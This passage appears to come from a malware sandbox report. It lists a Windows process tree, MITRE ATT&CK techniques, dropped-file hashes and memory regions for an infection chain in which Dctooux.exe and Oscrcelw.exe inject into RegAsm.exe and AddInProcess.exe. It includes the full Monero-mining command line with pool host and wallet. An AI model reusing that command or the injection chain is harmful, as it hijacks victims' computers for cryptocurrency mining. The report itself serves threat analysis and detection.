"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:756

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:4752

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:4116

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4520

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Modifies registry class
PID:4016

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3760

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3448

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:1996

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2188

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:2460

C:\Users\Admin\AppData\Local\Temp\eff1401c19\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\eff1401c19\Dctooux.exe
1⤵
PID:3140

C:\Users\Admin\AppData\Local\Temp\eff1401c19\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\eff1401c19\Dctooux.exe
2⤵
PID:744

C:\Users\Admin\AppData\Roaming\1000008000\Oscrcelw.exe
"C:\Users\Admin\AppData\Roaming\1000008000\Oscrcelw.exe"
3⤵
PID:3476

C:\Users\Admin\AppData\Roaming\1000008000\Oscrcelw.exe
C:\Users\Admin\AppData\Roaming\1000008000\Oscrcelw.exe
4⤵
PID:3820

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
5⤵
PID:4268

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
6⤵
PID:3412

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 41ro9pm28wkFbbFCnmC78AfqpdFTw3fE56kajDNhw3naU9nXJQiqSvi7Vv71yAxLG3hXtP5Jne8utHn1oHsPXo1MQBhA5D6.miners -p x --algo rx/0 --cpu-max-threads-hint=50
7⤵
PID:4436

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:1968

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4032

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:1236

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2128

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:964

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:3760

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4996

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3700

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:2176

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2144

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4244

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4364

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4028

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4896

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4272

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53

Filesize
471B

MD5
13257e40f392766b28ca260a1a7e304a

SHA1
e1965dd778bf9ab13f58b32952b0a28b12109370

SHA256
3382cb26f535244e0fc99b96966948b9aaa9081662960038527dbfb64fcc5644

SHA512
fd2e4809cd2eb83bc83d4c18edd64ae2cb4c3324541220c15fb5a2cd96ad90771f82e2efbebd5452372830d610f2abd2cdf77f49c62c545cb31b52d67e768551

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53

Filesize
412B

MD5
53b90d69269bd54c1a6d2b6ddb985144

SHA1
027ed73fbf13c1704cbf70dcbcc4c5e0b3718951

SHA256
ac56b738b6f879c30c2a02bd0ed956decfd002223d10e17541e89ba7a03fed86

SHA512
67e5dbd165c6905eb88d241f3bbb89474d3ef1238c6db7dea5791364025db9f26fd17f588d707075118b5ea6960d20b50f0d201f5757468574cf3138252fb3c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Oscrcelw.exe.log

Filesize
1KB

MD5
9f5d0107d96d176b1ffcd5c7e7a42dc9

SHA1
de83788e2f18629555c42a3e6fada12f70457141

SHA256
d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097

SHA512
86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

Filesize
2KB

MD5
74ae400fc5370a0f4c3f9ff0262a6a66

SHA1
3cba1fc7a5c3886c643b82d206eac82559667e93

SHA256
a0c96c8b4e377b7859da978950a579e9de78510b2e6e5d37a2fe996146792a02

SHA512
b3506eb7626e17d8b3429993b11532dc4f7695d2bc5d82b1a07f34e2b0048ea74da5f33af02b8377a09a8b8d6bc18d19defc1655cbbeaf55040f3b33fe0ead9a

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\BHN90SAO\microsoft.windows[1].xml

Filesize
97B

MD5
a49784c6007e88174d13fd2a1d1603c8

SHA1
96351722a846ad8a396b7cd3285ac30a8edf3768

SHA256
bf97a280596c60fa7130725b7426e7cd5ccfb759c909b5ef0b1575df2654ca91

SHA512
b0c5f6550c560e3bee33be9261bee95a006cd63a57d56b3a4b6c3c8f9ca2c6f222bfd2e8933e663f4b644457b48eb638160c8b9a6814b47a3fd4760f74f825ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\4C5A.exe

Filesize
763KB

MD5
14f7c4b98e2c837e555d030bfbe740c4

SHA1
695e50ac70754d449445343764d8a0c339323a04

SHA256
585892aac1dd2104c9dc5badf75efbc0d5f363456c084741af5e251402473de0

SHA512
c72065546378ea95362d370b6e5fe6aa75e197c2a156193057f6ffe0f4c010ad3a2d7b6d024b02f7aee91b97dd6740833911107bcdb8a7fae2316e0ef8228cc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\803511929133

Filesize
75KB

MD5
ab7ad3f6a59eb9c2972bde55c503f104

SHA1
9a3c35f244f68ee92f8af3a44fa2416219cc28fa

SHA256
f3125a40cbf547a112a3dff1391d2f5825d11fef5c3ffeb95bb8fa7a7f2196f9

SHA512
21258d00f64e2a56f95877021ee63d3f44df1b346daf04a49af08bdc408ad79bcb857b384a292df99b11b8061ad5f6a596a450ac2237ec10aaca5715d9acf23b

Download Submit
C:\Users\Admin\AppData\Local\Temp\AA98.exe

Filesize
222KB

MD5
11ac7990dacb8fed9a583f69660a8310

SHA1
a891612189e2db49a16704a9ac08850c5a76be3d

SHA256
b6d7d2ab6d7e66ba154aac8266fd5e0f6667c11d3cc682b241da586a5577581a

SHA512
7613b538549467fb21b3d3a4c25c82a6ab44a384b832efc6cd420b32083bf81e4563f4e558cf316532cc7d8fed68f5d232c9bfeb4335230e8c6db20c036a20d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C600.exe

Filesize
750KB

MD5
fb41f20c1783dee1ff3ff24e9320ef44

SHA1
873e409ee8fd52a51031269bee1b5e56207b8cf8

SHA256
3f8c53cc5aff0effc748241349db40bff4d9c3004b557c091c00ed192d8f4226

SHA512
b83682f64c79dab3ac134a2f42fa111882a6e7555d59b112599953a532091e67b76a1fd0da3426e516912c3e650ebed79d0bdc0ba9b4317f0bfb341e0b4cd481

Download Submit
C:\Users\Admin\AppData\Local\Temp\C600.exe

Filesize
386KB

MD5
8dba338c06d56581dee846ccd53f0109

SHA1
4e534d89a96ceb74409e819b2fd8a4e58f0e4cd7

SHA256
235178b7c347f6f244d0a1d1fdb43fa11d9c70e2aeec4841329b790775e9f25d

SHA512
a1c2da8a3b9d7f17e9991fa11d75b2386684e2f13b162b88a337c3ccb0b64b34568658e8511871fb227398a4bd9a98bf79f40209dc6781180ddd627847746f7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\D738.exe

Filesize
3.2MB

MD5
61ffa6120e8b47f583e6736560fa9bfe

SHA1
379187ce638c4750a1ae5c41be80008ee4efd382

SHA256
cc2d8a9ce9e760e5f7475a6de88cbfb1fed33d6027719ec81282928558584ac0

SHA512
dac3e9b2dd689534867fe3900f08e28aee7baf1f706cee3dffe6a6f6286c4c5e1810bfcabc66edd9faa6fbe6bc2a67b63c1ed86461c156cc68fd471dc276174c

Download Submit
C:\Users\Admin\AppData\Local\Temp\D738.exe

Filesize
2.0MB

MD5
5a4a32c07036e786713312d80a52b259

SHA1
2521585a81bcebc08fc554f722eae1d38084c1aa

SHA256
a6e89555a92c980aa22d40dccee8cd92f89a17961edaf8265a2f5674882941d1

SHA512
3b1438bbff230d1dd98d9b67b100a455ddc6666396e756afe92ac30188298273bb856fda6fac8d50d9851c9b9d31b72704aa0d5bab2825e9fe6e2895ac1e6e0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\F408.exe

Filesize
380KB

MD5
d9ec192c82b59ae4dfae55218b19530f

SHA1
d7170975baf5f27ea0591a33f45cddb63574ac94

SHA256
52c5799b3c93ca11e9953e8a5712a82dd08b6cb0c17ff90cb1d2cb104411e7d4

SHA512
7ed6906f71ac045b2a4732935995abdfde68d88fe6041b19f114dfb95fb943450d5cbfbf1d185d3a2febb29c7d3493b9c1247a84925a5e7af41e1c710cc77838

Download Submit
C:\Users\Admin\AppData\Roaming\1000008000\Oscrcelw.exe

Filesize
1.2MB

MD5
302ac1d64dabebfeb1ecb1ddbd1f46b0

SHA1
3b44fc274eeb6b20282586f478ead732cfc74ddf

SHA256
003552c7c95845ab8bd7638e9c3365607701aff4d82220154debf9f8559171ee

SHA512
d6a6d54f66603aea20d8af271f406ca164a441d43baff316fb0f986fbb95416238484a79ffe740de5689e829716dac078fad4225bc74bb433c1d2e61e6d4cb2f

Download Submit
C:\Users\Admin\AppData\Roaming\1000008000\Oscrcelw.exe

Filesize
655KB

MD5
9f01aca00fd7b1db452df405fea48671

SHA1
e947fc28643137185036e683c7a5f620671e9078

SHA256
cce3cdb55271d1eea08bb1cbffaf49e6a570b52cc7aa06762db29e38b90e25d3

SHA512
39d0986a4bf02f376d1f3d7d7eebe6aaaf85cff3ea2bf56da8f686522ef2786b23cc37ed0af7ff2f9e5fa01829bd811a056cefd82c49e421d79c867c9e2215b3

Download Submit
memory/404-28-0x0000000002190000-0x00000000022AB000-memory.dmp

Filesize
1.1MB

Download
memory/404-27-0x0000000000560000-0x0000000000600000-memory.dmp

Filesize
640KB

Download
memory/744-2123-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/948-49-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/948-50-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/948-52-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/1184-1065-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/1184-1056-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/1800-19-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1800-17-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1800-16-0x0000000000580000-0x0000000000680000-memory.dmp

Filesize
1024KB

Download
memory/2400-59-0x00000000016C0000-0x00000000016C1000-memory.dmp

Filesize
4KB

Download
memory/2400-80-0x00000000008A0000-0x0000000001154000-memory.dmp

Filesize
8.7MB

Download
memory/2400-61-0x00000000008A0000-0x0000000001154000-memory.dmp

Filesize
8.7MB

Download
memory/2400-60-0x00000000008A0000-0x0000000001154000-memory.dmp

Filesize
8.7MB

Download
memory/3140-1181-0x0000000074400000-0x0000000074BB0000-memory.dmp

Filesize
7.7MB

Download
memory/3140-1182-0x0000000005180000-0x0000000005190000-memory.dmp

Filesize
64KB

Download
memory/3140-2116-0x0000000005140000-0x0000000005141000-memory.dmp

Filesize
4KB

Download
memory/3140-2121-0x0000000074400000-0x0000000074BB0000-memory.dmp

Filesize
7.7MB

Download
memory/3476-3096-0x00000264D4690000-0x00000264D4691000-memory.dmp

Filesize
4KB

Download
memory/3476-2162-0x00000264EE960000-0x00000264EEA9C000-memory.dmp

Filesize
1.2MB

Download
memory/3476-2161-0x00000264EE810000-0x00000264EE820000-memory.dmp

Filesize
64KB

Download
memory/3476-2158-0x00000264D4140000-0x00000264D4276000-memory.dmp

Filesize
1.2MB

Download
memory/3476-2159-0x00000264EE820000-0x00000264EE95A000-memory.dmp

Filesize
1.2MB

Download
memory/3476-3103-0x00007FF9DAC90000-0x00007FF9DB751000-memory.dmp

Filesize
10.8MB

Download
memory/3476-3097-0x00000264EE6F0000-0x00000264EE7C2000-memory.dmp

Filesize
840KB

Download
memory/3476-2160-0x00007FF9DAC90000-0x00007FF9DB751000-memory.dmp

Filesize
10.8MB

Download
memory/3488-4-0x00000000032D0000-0x00000000032E6000-memory.dmp

Filesize
88KB

Download
memory/3488-18-0x0000000007FC0000-0x0000000007FD6000-memory.dmp

Filesize
88KB

Download
memory/3776-29-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3776-31-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3776-32-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3776-33-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3776-43-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3796-91-0x0000000007EC0000-0x00000000083EC000-memory.dmp

Filesize
5.2MB

Download
memory/3796-86-0x0000000005170000-0x00000000051AC000-memory.dmp

Filesize
240KB

Download
memory/3796-92-0x0000000007CE0000-0x0000000007D30000-memory.dmp

Filesize
320KB

Download
memory/3796-90-0x00000000077C0000-0x0000000007982000-memory.dmp

Filesize
1.8MB

Download
memory/3796-89-0x0000000005A50000-0x0000000005AB6000-memory.dmp

Filesize
408KB

Download
memory/3796-84-0x00000000058D0000-0x00000000059DA000-memory.dmp

Filesize
1.0MB

Download
memory/3796-87-0x00000000051B0000-0x00000000051FC000-memory.dmp

Filesize
304KB

Download
memory/3796-85-0x00000000050D0000-0x00000000050E2000-memory.dmp

Filesize
72KB

Download
memory/3796-94-0x0000000074400000-0x0000000074BB0000-memory.dmp

Filesize
7.7MB

Download
memory/3796-83-0x0000000005EF0000-0x0000000006508000-memory.dmp

Filesize
6.1MB

Download
memory/3796-82-0x0000000004F00000-0x0000000004F0A000-memory.dmp

Filesize
40KB

Download
memory/3796-81-0x0000000004F80000-0x0000000004F90000-memory.dmp

Filesize
64KB

Download
memory/3796-72-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/3796-76-0x0000000005320000-0x00000000058C4000-memory.dmp

Filesize
5.6MB

Download
memory/3796-79-0x0000000074400000-0x0000000074BB0000-memory.dmp

Filesize
7.7MB

Download
memory/3796-78-0x0000000004E50000-0x0000000004EE2000-memory.dmp

Filesize
584KB

Download
memory/3820-3102-0x0000000000400000-0x00000000004B4000-memory.dmp

Filesize
720KB

Download
memory/3820-3106-0x000001F97F8B0000-0x000001F97F9B2000-memory.dmp

Filesize
1.0MB

Download
memory/3820-3105-0x000001F97F010000-0x000001F97F020000-memory.dmp

Filesize
64KB

Download
memory/3820-3104-0x00007FF9DAC90000-0x00007FF9DB751000-memory.dmp

Filesize
10.8MB

Download
memory/3820-3107-0x000001F9195C0000-0x000001F9195C8000-memory.dmp

Filesize
32KB

Download
memory/3820-3108-0x000001F9195D0000-0x000001F919626000-memory.dmp

Filesize
344KB

Download
memory/3820-3110-0x000001F97F010000-0x000001F97F020000-memory.dmp

Filesize
64KB

Download
memory/3820-3112-0x00007FF9DAC90000-0x00007FF9DB751000-memory.dmp

Filesize
10.8MB

Download
memory/4268-3111-0x000002A67B850000-0x000002A67B860000-memory.dmp

Filesize
64KB

Download
memory/4284-1054-0x0000000074400000-0x0000000074BB0000-memory.dmp

Filesize
7.7MB

Download
memory/4284-125-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-141-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-1046-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/4284-1047-0x0000000005090000-0x00000000050F0000-memory.dmp

Filesize
384KB

Download
memory/4284-1048-0x00000000050F0000-0x000000000513C000-memory.dmp

Filesize
304KB

Download
memory/4284-137-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-100-0x0000000074400000-0x0000000074BB0000-memory.dmp

Filesize
7.7MB

Download
memory/4284-99-0x0000000000530000-0x00000000005F6000-memory.dmp

Filesize
792KB

Download
memory/4284-133-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-135-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-131-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-129-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-127-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-115-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-117-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-119-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-121-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-101-0x0000000004E30000-0x0000000004E40000-memory.dmp

Filesize
64KB

Download
memory/4284-139-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-123-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-102-0x0000000004E40000-0x0000000004F08000-memory.dmp

Filesize
800KB

Download
memory/4284-103-0x0000000004F10000-0x0000000004FDA000-memory.dmp

Filesize
808KB

Download
memory/4284-113-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-111-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-105-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-104-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-107-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4284-109-0x0000000004F10000-0x0000000004FD3000-memory.dmp

Filesize
780KB

Download
memory/4616-68-0x0000000074400000-0x0000000074BB0000-memory.dmp

Filesize
7.7MB

Download
memory/4616-70-0x0000000004E50000-0x0000000004E60000-memory.dmp

Filesize
64KB

Download
memory/4616-67-0x0000000000290000-0x00000000002F4000-memory.dmp

Filesize
400KB

Download
memory/4616-75-0x00000000026F0000-0x00000000046F0000-memory.dmp

Filesize
32.0MB

Download
memory/4616-77-0x0000000074400000-0x0000000074BB0000-memory.dmp

Filesize
7.7MB

Download
memory/4848-3-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/4848-5-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/4848-1-0x0000000000810000-0x0000000000910000-memory.dmp

Filesize
1024KB

Download
memory/4848-2-0x00000000005A0000-0x00000000005AB000-memory.dmp

Filesize
44KB

Download
memory/5080-47-0x00000000005F0000-0x000000000068D000-memory.dmp

Filesize
628KB

Download